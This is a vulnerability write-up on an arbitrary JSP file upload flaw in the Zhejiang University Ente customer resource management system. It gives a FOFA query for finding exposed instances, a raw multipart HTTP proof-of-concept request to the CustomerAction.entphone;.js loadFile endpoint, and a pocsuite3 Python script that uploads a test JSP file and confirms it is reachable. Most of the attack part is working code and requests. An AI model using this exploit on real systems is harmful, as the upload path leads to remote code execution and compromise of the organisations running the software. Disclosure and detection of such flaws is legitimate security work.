Disclaimer
The vulnerabilities involved in the article have been fixed, and sensitive information has been coded. The article is only for experience sharing . Do not take it seriously. Unauthorized attacks are illegal! Sensitive information in the article has been processed at multiple levels. The user shall be responsible for any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article. The author does not bear any responsibility for this. Please be responsible for any consequences.
Vulnerability description
Zhejiang University Ente Customer Resource Management System is a software product aimed at enterprise customer resource management. The system is designed to help companies efficiently manage and utilize customer resources and improve sales and marketing results. The system's CustomerAction.entphone;.js interface allows attackers to upload arbitrary malicious JSP files to the system, which may lead to potential remote code execution attacks. This vulnerability could have severe impacts on the integrity and security of the system.
fofa statement
title="欢迎使用浙大恩特客户资源管理系统"
POC plus detection
POST /entsoft/CustomerAction.entphone;.js?method=loadFile HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye8FPHsIAq9JN8j2A
------WebKitFormBoundarye8FPHsIAq9JN8j2A
Content-Disposition: form-data; name="file";filename="test.jsp"
Content-Type: image/jpeg
<%out.print("test");%>
------WebKitFormBoundarye8FPHsIAq9JN8j2A--
After successful execution, filepath will be returned, and the spliced path will be used to access the file.
poc script
pocsuite framework for scripts
# _*_ coding:utf-8 _*_
# @Time : 2023/12/15
# @Author: 炼金术师诸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str
class zhedaente_upload(POCBase):
pocDesc = '''浙大恩特客户资源管理系统CustomerAction.entphone;.js文件上传漏洞'''
author = '炼金术师诸葛亮'
createDate = '2023-12-15'
name = '浙大恩特客户资源管理系统CustomerAction.entphone;.js文件上传漏洞'
def _verify(self):
result = {}
url = self.url+ '/entsoft/CustomerAction.entphone;.js?method=loadFile'
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0 uacq",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Connection': 'close',
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarye8FPHsIAq9JN8j2A"
}
path = "/entsoft/CustomerAction.entphone;.js?method=loadFile"
try:
data = '------WebKitFormBoundarye8FPHsIAq9JN8j2A\r\nContent-Disposition: form-data; name="file";filename="test.jsp"\r\nContent-Type: image/jpeg\r\n\r\n<%out.print("test");%>\r\n------WebKitFormBoundarye8FPHsIAq9JN8j2A--'
response = requests.post(url, headers=headers, data=data)
if response.status_code == 200:
response_json = response.json()
filepath = response_json.get('filepath')
if filepath:
check_path = self.url + filepath
check_response = requests.get(check_path, headers=headers, verify=False)
if check_response.status_code == 200 and 'test' in check_response.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['path'] = path
return self.parse_output(result)
except Exception as e:
pass
register_poc(zhedaente_upload)
Script exploit